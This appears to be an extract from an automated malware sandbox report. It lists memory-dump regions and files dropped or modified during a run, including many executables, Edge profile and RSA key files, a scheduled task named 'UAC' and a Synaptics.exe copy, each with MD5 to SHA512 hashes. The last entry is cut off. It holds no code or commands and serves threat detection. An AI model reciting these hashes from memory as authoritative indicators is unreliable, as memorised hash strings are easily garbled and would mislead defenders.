memory/6384-2446-0x00000000074B0000-0x00000000074CA000-memory.dmp

memory/6384-2447-0x0000000007CD0000-0x0000000007CD6000-memory.dmp

memory/2076-2460-0x0000000000400000-0x000000000066D000-memory.dmp

memory/6512-2461-0x000002357C3D0000-0x000002357C95C000-memory.dmp

memory/5144-2464-0x0000026127400000-0x0000026127750000-memory.dmp

memory/6512-2463-0x000002357D560000-0x000002357D798000-memory.dmp

C:\Users\Admin\Desktop\Files\pp.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

memory/6512-3567-0x000002357D7A0000-0x000002357D952000-memory.dmp

memory/6536-3609-0x0000000000400000-0x00000000005D8000-memory.dmp

C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe

MD5 eb89a69599c9d1dde409ac2b351d9a00
SHA1 a708e9a84067fd6c398ddfd0ac11ae48d9c41e4c
SHA256 e9de3019d8993801fd32f5e00492fa4f5d389100146a1f6f2d7170cb8b7afebd
SHA512 e8fcf4b8ad1747df2595aeea190e2710a42668d4cf5291fa40f67a5317cecb6d62819c9fb26c541e509f756a40858d4714936ab0c5da6ebf62024c098b0f1876

C:\Users\Admin\Desktop\Files\av_downloader1.1.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0f09e1f1a17ea290d00ebb4d78791730
SHA1 5a2e0a3a1d0611cba8c10c1c35ada221c65df720
SHA256 9f4c5a43f0998edeee742671e199555ae77c5bf7e0d4e0eb5f37a93a3122e167
SHA512 3a2a6c612efc21792e519374c989abec467c02e3f4deb2996c840fe14e5b50d997b446ff8311bf1819fbd0be20a3f9843ce7c9a0151a6712003201853638f09d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

MD5 e5e3377341056643b0494b6842c0b544
SHA1 d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256 e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 63716c70d402b580d244ae24bf099add
SHA1 98a3babcd3a2ba832fe3acb311cd30a029606835
SHA256 464f0f2ca24510abc5b8d6ca8240336c2ed1ddf5018fbadb092e18b5bf209233
SHA512 dfe1a5831df6fa962b2be0a099afba87b1d7f78ce007d5a5f5d1c132104fdb0d4820220eb93267e0511bc61b77502f185f924022a5066f92137a7bb895249db2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 83088f8db7196efb93821721ee1c0634
SHA1 3ea53e84b73aa4b845a9201659ab8354cfc1e8ff
SHA256 c669875ced9f95526f14b6e5348fb2a6dda05820b1fe8049703f7107c439bff5
SHA512 4fa02f94e2b6b094482ed6ac2a87f9310517f01b6e6455417daee0522c59f73b5aaca457e638808b094e0af7904649b6cfc5d17ddf300e8b631a2947be759472

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 aa10f656cc16d036a580048ba0bdac0b
SHA1 52c15a55cc3b56bd1bf5dd0efcd2b66413b7044c
SHA256 166d97573db5472f64c5d066f2b07e6fbff2f1f9d5858fd7757548e334e9220d
SHA512 748fc7d5155285784ecea52d01af8168213210231a698073945b30b4989ae28463a7fee01e24792fd33b17744cd54587f801c5e836c926d700724171bb0000e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 651de0eac7a7c2de2849134ad2c7112b
SHA1 8639cae8c508a195c997053d0074abf1946567d7
SHA256 5d7889065e40f2faf8fc7e43d48bb13e7e728a77cd49912c2af74529163d0ef1
SHA512 37136e4d8e6241cc4607a4a2455a72275c61570b9c4767628a9eb021c37c327d1f9eb031b3a0ecef50af89cbfbba6ff48501685d21b4f3927a0bd4004d1f06b4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 c240d53e0348865befe267a2b36634f6
SHA1 49769c44d2e2930eda6b7374697d5f446135ef50
SHA256 8915599107ca102db7ffceffea774a45a95076afd6d3a23bf51318a1d9209481
SHA512 62e644e525d125327b48d5188c6a43a1037b51e57ecb1ad58f7c1f19fb8c13c6e200e2145275888ed49af58a361d4fe0cb3c097578ba4fdb4370c791950f7eba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4390246f766adc271b0a6bc5a253f66b
SHA1 9a7ca3f95ab88ea6d70950d9b18b8ca1c9e9ff2c
SHA256 de5321eda111e7b33eb17aa99d8f497324a87e83b563ff245cc70c8bcb16c652
SHA512 7d1a45af12b3aa7923b6c9bfbcee47a9bad13ed0b40979693ee07d65568f783f648ea063ae2787ba19fa1551a3cd936ceb0167823b294afb42b41e2f50ffb4fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 52414929ba58599794ce072e8e7d2279
SHA1 95fa3bda7f60b91bd052b22fd803467c7351f214
SHA256 f6edbe45fc667fc4373183d941863f0b32ccda74965c165afcf3d6bb11584eb5
SHA512 943ad266f2bd0962b0221d75973b74a7ed758363ff1ba2a98109471e15e39f63331170936460545bc88c12e015b5c986ae40b2b107793891c2cd17121ac7ff80

C:\Users\Admin\Desktop\a\7mpPLxE.exe

MD5 82bb7a2c4d05216ec5fc07aa20324bc1
SHA1 3f652844912f6c134c656da0ef35750c267016dd
SHA256 56e333f04b51aa90a9d086eb855ac51b23c19170f7989f770f6a56383cffe8f2
SHA512 efc991b07660b93c2562c58c91bb4ce1f8f907848e3f2ac4c45c80016025148877cf25df336afd041106fa35376ffe2868695c92d2c6f81ae107d16c7cdf051a

C:\Users\Admin\Desktop\a\0fVlNye.exe

MD5 978752b65601018ddd10636b648b8e65
SHA1 2c0e320cb0d84c6760a925d873d58e701e3e6cb1
SHA256 8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782
SHA512 f29382d1c14cff16ee09febc5e3c875580de84494ba0510fcae06a1e024ffd00c96d3e962d2da2132ebd864d085218c79979c1df7f3334ea2e26b5ed39cbdbe1

C:\Users\Admin\Desktop\Files\bwapp.exe

MD5 17ba78456e2957567beab62867246567
SHA1 214fed374f370b9cf63df553345a5e881fd9fc02
SHA256 898db742c0c5503bc396a53b67b8a86da0722d51907c4be2beb364c2d578023a
SHA512 2165ba2aa0a0214f06bc31402bc2ea170d11032efc7ee56070b6abb0feb322b082ffd5dc5b2ad9841295ea85bd25826ba55fb00ed924fdb5ffd0f9f14d671eba

C:\Users\Admin\Desktop\Files\System.exe

MD5 3d2c42e4aca7233ac1becb634ad3fa0a
SHA1 d2d3b2c02e80106b9f7c48675b0beae39cf112b7
SHA256 eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065
SHA512 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957

C:\Users\Admin\Desktop\Files\._cache_System.exe

MD5 8c423ccf05966479208f59100fe076f3
SHA1 d763bd5516cddc1337f4102a23c981ebbcd7a740
SHA256 75c884a8790e9531025726fd44e337edeaf486da3f714715fa7a8bdab8dbabe3
SHA512 0b94558cbfd426300673b4d98e98a9408de236fe93bb135fa07e77ee0851621bfc9a5129322f31c402a606ab1952eb103de483c3b48a86c3225318d98f78bc20

memory/7028-4085-0x0000000000290000-0x00000000002A0000-memory.dmp

C:\ProgramData\Synaptics\Synaptics.exe

MD5 075045f176129f6b11d627db7c7a3c76
SHA1 d815d313d2882041b8adb063eda6a8bd62149443
SHA256 86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8
SHA512 86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

C:\Users\Admin\AppData\Local\Temp\RCX641E.tmp

MD5 8aaf9571b337480731c01811752b2b3a
SHA1 1297ba0e823b7c65b3592e9f68499b24804196f5
SHA256 9c02623c2d7a9c4c62861965feacf8ad82bda2b405c69595a85fb6b2eed6c6eb
SHA512 4270dec634009b79e66ef7191db1afe174ec592e0eea6f40c89ff0908c9aa07af06166227a61209b9ae65dc2ceb46651c872456495cc394a424bf6f74d57970a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4308375cbff02f4e4ceb25126d982159
SHA1 406a4d195a2fa4931af6cce72b0586d6b6d7cc92
SHA256 f6e1dad66da99edf88ca4a7b8716de807f94d5a7fc20b4cd8d2c492affc189b7
SHA512 958522a39218e6ba6b26bd1233ddcbb91e6c2902c4c99c4ccb2801c86a4a53336affb5e650ba5d6ca4d92a426894a442f42f06a51cfa7cc553036b411aae98ad

C:\Users\Admin\Desktop\Files\Opdxdyeul.exe

MD5 cee58644e824d57927fe73be837b1418
SHA1 698d1a11ab58852be004fd4668a6f25371621976
SHA256 4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e
SHA512 ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5

memory/6128-4201-0x00000000053E0000-0x00000000053F2000-memory.dmp

memory/5800-4209-0x0000000000420000-0x0000000000506000-memory.dmp

memory/5800-4210-0x0000000004FD0000-0x00000000050AA000-memory.dmp

memory/5800-4211-0x0000000004D50000-0x0000000004E2C000-memory.dmp

C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe

MD5 a23837debdc8f0e9fce308bff036f18f
SHA1 cf4df97e65bc8a17eefca9d384f55f19fb50602f
SHA256 848260ba966228c4db251cfbcc0e02d6ca70523a86b56e5c21f55098cec92479
SHA512 986e7354d758523ae4f4c2f38e4b8f629dbeeaba4b60bfd919d85139e8d8c29c0489989deab6e33022d6a744bdd93ce7c8e687036c5c4af63cce6e6f6e8bd0ad

C:\Users\Admin\Desktop\Files\v7wa24td.exe

MD5 6782ce61039f27f01fb614d3069c7cd0
SHA1 6870c4d274654f7a6d0971579b50dd9dedaa18ad
SHA256 11798c5a66618d32e2666009fb1f4569ae8b2744fa0278f915f5c1eefb1fd98d
SHA512 90fc316784eba2e553c2658ac348e6fcb4ab6987209d51e83c1d39d7a784ca0f18729349904bac6d92d3b163ce9f0270369a38eac8c9541ae211d74bce794938

memory/5800-5342-0x00000000050C0000-0x0000000005118000-memory.dmp

memory/2348-5349-0x000001E50E310000-0x000001E50E3D8000-memory.dmp

memory/7312-5448-0x0000000005D50000-0x00000000060A7000-memory.dmp

memory/7312-5453-0x000000006CD30000-0x000000006CD7C000-memory.dmp

memory/7312-5463-0x0000000007460000-0x0000000007503000-memory.dmp

C:\Users\Admin\Desktop\a\IMG001.exe

MD5 d59e32eefe00e9bf9e0f5dafe68903fb
SHA1 99dc19e93978f7f2838c26f01bdb63ed2f16862b
SHA256 e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145
SHA512 56a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587

memory/3784-5509-0x0000000004960000-0x0000000004BCD000-memory.dmp

memory/3784-5508-0x0000000004960000-0x0000000004BCD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9saFXzb1.exe

MD5 51db0ce6b2d685a22e8974c92ff9f232
SHA1 7bcec344630c7bb99afa910cd4d390b363055c66
SHA256 2dd9e949c84d7f8a31ce952ae1a978271e6b7aaee6be37a3a84dfe7bb142eaf9
SHA512 acd384859cc1eb96d914b9b66021f1da79f255555aa5eb273438f1ffdf318f529540f91da46b399454b70886c3e7870503ff9f55eba757ae6223e1f374cad340

C:\Users\Admin\AppData\Local\Temp\pHT9yNbh.exe

MD5 dad408ca8aca4df729d62a3729301823
SHA1 69cf964d180db87b79779c1948a49428d330e729
SHA256 7cf15255717402228f7fff11ee43fbd7ecd8d58f48566b978dcd6178073f249e
SHA512 c52d5ab8cd34f8853f745d8416d4c5081458667b2b4071c61a731d221c15874d855cd93f2f3e1d621e8ea85e8f7f954f3a21eee158fb6ffcb6a7139f9df85727

C:\Users\Admin\AppData\Local\Temp\cDmPcHPP.exe

MD5 e685e9c7a31bb690c53334eaf51f5017
SHA1 a72150f36a9271cc303573405c4aa70af3cddf1e
SHA256 ddc59acaf0f5c15de46767f632eadb65f8cda21f76412780bb96b7cd5a81f4e6
SHA512 9c483491268ea1bbe30860d6ee1357735d74715973adb0d2180786114133d62f77cda9f854ec636ef16e4c3e329efed2479343010518960b461efb4df3315dce

memory/3784-5577-0x0000000004960000-0x0000000004FEE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qygcBAAU.exe

MD5 247056faae13eea7b06c38b2c0b08001
SHA1 2fc5d8ea97859890e5dc7721477589a1161a61d2
SHA256 97159e907099047cc3a62510439e8cf112fa9196db7369f59e504cf4fb250288
SHA512 d22bdd0665eb91efd9334de1fa32c986357dbbebe2ca497a3c7793b52ff934b9e2471dc45588d02fb283fa5f286f2c0bac10d0c250d4d68e623d6ecf5f03d99f

memory/3784-5563-0x0000000004960000-0x0000000004FEE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YACjSK4N.exe

MD5 965210280bb2d4d0c3c3e118f07ed2c4
SHA1 ddacd2d1b713c56047ba810af3c927f0cb427505
SHA256 5f875ccc59b02f094780cb6b3c8ac9ba62edc5ed56ab71f74c0d8a5b1d36d5a1
SHA512 fd8c6126b44ff51d1d4537ad3b425b78a490d62c9872201c1b0f2707f7ff030371dd6d437681e22e92186253151b3c03ca2a5c85b9d11cbd2d2be4a455899f39

C:\Users\Admin\AppData\Local\Temp\COh6Krwr.exe

MD5 651dad665895958f7fb261f03d19f661
SHA1 24ad3d46c6229e2ac637d5b8d3f2d656a4823f34
SHA256 8347d151f760cfff0f3120c8cf614f26a452d9ed895e966fba65d263b0d182f9
SHA512 9b956e26dbff45ec012ec86766b5ce8b19246290b81d6df225b4b9b03172b17c1a8896b7116cbc23e87323e6fbffbbaa38de2ea7879cbb528534def7248900c6

C:\Users\Admin\Desktop\a\rh.exe

MD5 4cecb04d97630cc2d5cce80368b87fdd
SHA1 4f693736497e06c820b91597af84c6fece13408b
SHA256 51698570a9c637ec0c9bc2b3ca6acb7edf3d7804c49b8eed33e82573950877dd
SHA512 acdf93d12791a6a11b307fbbdc6df2b27a6e8de6b8cc015c4892304d4653e79ac58351600b53c7ea78d285d69df8e8f2e270cf9a168b187d372a3de17e84ec66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2f0ad60326ea3954ea931f5ef2021000
SHA1 081ad4146b61f51c9a0bfd34a71cdc52abd56a30
SHA256 e61927273aab0a19760944965aa752c33d5896b1e4e21744ddd7bea5bea05e90
SHA512 d510d02af30fe4353333755fa32f9e4663bc40a95522464b1e2bda264e419b9d928c013156df131661ce54272edcf2eaf32e1a2741019f3a02de4f84079cae2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4f986b648e166261ab4b6674088af2ce
SHA1 c64c5937a70708c690dcb14484357ca22940e8fd
SHA256 658b867ac3c8eb8ac3d96450a6fffd2fefe61a0b72b453008cde2aa89ede75e9
SHA512 47efabcf5c7e43be0e286f000cfa7da47862b5acc0439e2d7e68d0e59cfb4185453e14f370e7047c46e4fdd7fb68716308d16c19abed5defba38d12c1b66fff4

memory/4028-5713-0x0000000000CB0000-0x000000000116E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 92e7d7640697e34845d364229d07cfbe
SHA1 43087063b1458d0c8797d188b51f54f03ed8fc4d
SHA256 887bf5686c80485f36fcc3d767d2c49c7225ad9057be9cc1132a192417851550
SHA512 d80ada1204f00b7b6ee5434eb8ddbcd08646a6006ff88f53521deeab4cc10131f7d759fa5576f5269d15b45248825405d7663c712042ec23612477217086a9a1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe5dbdc5.TMP

MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

C:\Users\Admin\Desktop\a\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

memory/1276-5752-0x0000000000430000-0x0000000000442000-memory.dmp

memory/1276-5754-0x0000000000BE0000-0x0000000000BE6000-memory.dmp

memory/4028-5774-0x0000000000CB0000-0x000000000116E000-memory.dmp

C:\Users\Admin\AppData\Roaming\CMD.vbs

MD5 238ec4d17050e1841e8e0171407c2260
SHA1 2c8c14b257641f1e1151c6303dabde01621314f2
SHA256 163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA512 3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

C:\Users\Admin\AppData\Local\Temp\5ACD5E00

MD5 39295f7295eaaac94278bb02035401d6
SHA1 1b1fa204f0bc3875a2a5ac690cb8a3a857fd0a59
SHA256 c2299fbc486a43331b561bb899bc84a8e4c2074749af9a93bf0aa369cb90357c
SHA512 df35eab3391031826701403f1b86eeb7bb3c1b7049d68e69f5ee6da38b048c296ddf6eeb1a86e41ee69b22fdcda0907c07878419887eb8b350fe09652ec4feaf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 6e38825bce57f38d103d66d94bbb4307
SHA1 9e3ea37a712456ef7a243012e79521504e1daf1f
SHA256 dda81202a55de5fb21f957f747dbcbee276681c67966c1662629b8cf1caff4af
SHA512 b36ee83586a516f701b079f3e5309a173e37035b2dec93dd4418742a033027b7da597fc622054bd3fa8bbe2bc592aba1f7fcc33ff02257ba94f340350bdb589f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\tftp.exe

MD5 461ed9a62b59cf0436ab6cee3c60fe85
SHA1 3f41a2796cc993a1d2196d1973f2cd1990a8c505
SHA256 40fe74d3a1116ed8ca64c62feb694327a414059eeaef62c28bc5917e2e991b3d
SHA512 5f6f7528a05175cc1b8d927feaba56a90c70e8fe42c7ea01999cf328d28b8596de0df8d6d3fbc6e4fe5d89e36982871a59493dcb8d633fb942a35a217e4aedef

memory/3784-5946-0x0000000004960000-0x0000000004FEE000-memory.dmp

memory/3784-5944-0x0000000004960000-0x0000000004FEE000-memory.dmp

C:\Users\Admin\AppData\Roaming\LB31.exe

MD5 c9e6aa21979d5fc710f1f2e8226d9dfe
SHA1 d881f97a1fe03f43bed2a9609eae65531cf710cf
SHA256 a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d
SHA512 9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

memory/6660-7064-0x00007FF7DCE00000-0x00007FF7DD8FF000-memory.dmp

memory/6660-7099-0x00007FF7DCE00000-0x00007FF7DD8FF000-memory.dmp

memory/7304-7116-0x00007FF714110000-0x00007FF714C0F000-memory.dmp

memory/6404-7599-0x000001D279340000-0x000001D27935C000-memory.dmp

memory/6404-7600-0x000001D279360000-0x000001D279415000-memory.dmp

C:\Windows\System32\Tasks\UAC

MD5 833c2a98462aba8f75f0d8c512a00223
SHA1 f90fc6b124b95d432bcd1391724c465729a3be76
SHA256 87efcde96149c0eea2bd5ab1a7dfef8b3c8becc29037dd613391d7f876c960b5
SHA512 0f9eb2ca0315f581a2864b8c2513e60c0d375edafd46ceab7e3026f422b4761eb56d8bec736a9f68c23ae395d9e8f077c5511ab4c09bf12605fdee6381b65166

C:\Users\Admin\AppData\Local\Temp\nsdFE65.tmp\inetc.dll

MD5 d7a3fa6a6c738b4a3c40d5602af20b08
SHA1 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

C:\Users\Admin\Desktop\Files\abc.exe

MD5 37fa8c1482b10ddd35ecf5ebe8cb570e
SHA1 7d1d9a99ecc4e834249f2b0774f1a96605b01e50
SHA256 4d2eaca742a1d43705097414144921ae269413efa6a2d978e0dbf8a626da919c
SHA512 a7b7341c4a6c332aef1ffb59d9b6c5e56ec7d6c1cb0eff106c8e03896de3b3729c724a6c64b5bf85af8272bd6cf20d000b7a5433a2871403dd95cca5d96ebd36

C:\Users\Admin\Desktop\a\caspol.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

C:\Users\Admin\Desktop\Files\WindowsUI.exe

MD5 616b51fce27e45ac6370a4eb0ac463f6
SHA1 be425b40b4da675e9ccf7eb6bc882cb7dcbed05b
SHA256 ba22a9f54751c8fd8b2cfd38cc632bb8b75d54593410468e6ec75bdc0a076ae6
SHA512 7df000e6d4fe7add4370d3ac009717ce9343c4c0c4dbe32ceb23dc5269418c26fd339f7cf37ede6cb96ebe7e3ff1a6090a524f74f64485ba27bd13c893a169b2

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-870806430-2618236806-3023919190-1000\0f5007522459c86e95ffcc62f32308f1_f8cb507d-35a1-48c2-aef3-a249a39aae63

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-870806430-2618236806-3023919190-1000\0f5007522459c86e95ffcc62f32308f1_f8cb507d-35a1-48c2-aef3-a249a39aae63

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\Desktop\Files\gagagggagagag.exe

MD5 7f20b668a7680f502780742c8dc28e83
SHA1 8e49ea3b6586893ecd62e824819da9891cda1e1b
SHA256 9334ce1ad264ddf49a2fe9d1a52d5dd1f16705bf076e2e589a6f85b6cd848bb2
SHA512 80a8b05f05523b1b69b6276eb105d3741ae94c844a481dce6bb66ee3256900fc25f466aa6bf55fe0242eb63613e8bd62848ba49cd362dbdd8ae0e165e9d5f01c

C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe

MD5 112da2a1307ac2d4bd4f3bdb2b3a8401
SHA1 694bf7f0ea0ecfc172d9eb46f24bc2309bf47f4f
SHA256 217900ee9e96bcb152005818da2e5382cac579ab6edd540d05f2cdb8c8f4ce8b
SHA512 8455c8fb3f72eba5b3bf64452fb0f09c5fdc228cb121ca485a13daff9c8edef58ced1e23f986a3318d64c583b33a5e2c1b92220e10109812e35578968ed3b7a7

C:\Users\Admin\AppData\Local\Temp\ns6tJFwY.exe

MD5 ff2c72573de775aedcec1a64e6f3656c
SHA1 e4560ddb1c4f0f407472831b11a5f8ab38a8ba68
SHA256 ed2907b44a82269e8d3c632289c782d198ec53578126d18f8ca1378ab0975995
SHA512 0eb245125c044c1cb48058d2ef162e2b36ab2f22e45e6586064b448fec723a43df50f779a632f0851823d2f29816c0367af61156099ee5ce3b7434400bb15700

C:\Users\Admin\AppData\Local\Temp\ujv3iHQe.exe

MD5 725f6288b524deb40632eea0573e0277
SHA1 07692304f706819f0c25262f70ad3a7f907d3fff
SHA256 59a3dbbe144583dcd799b9568be999f9e8c2585cf6762a638d55ea87fd31a0c5
SHA512 9582a18a026f2b168ab0e441736be0b87068a6d027a76032d9fe8d95f34f2c45c4278c478dc43c545328515ea86c8b904b73dbd7eb905c676d84b60def6f88be

C:\Users\Admin\Desktop\Files\._cache_frap.exe

MD5 6e2ecc4230c37a6eeb1495257d6d3153
SHA1 50c5d4e2e71a39e852ab09a2857ac1cb5f882803
SHA256 f5184103aaacf8c9a7b780ccf7729be92cb813b3b61f4d1a9394352050ae86a2
SHA512 849f39d00cdb3c1481adfe7a2b1745ba97cf02e6e45b471ec1e3292ef92130e2319455702c71f5c531926d008dd2e9dfbfe9d66e1c81406bc9532eb4bf1febd6

C:\Users\Admin\Desktop\Files\whiteheroin.exe

MD5 ca0a3f23c4743c84b5978306a4491f6f
SHA1 58cf2b0555271badc3802e658569031666cb7d7e
SHA256 944113e85a7cf29d41fbbb30f87ea2554d036448a0bdb1e4e2b2ade3f99a9359
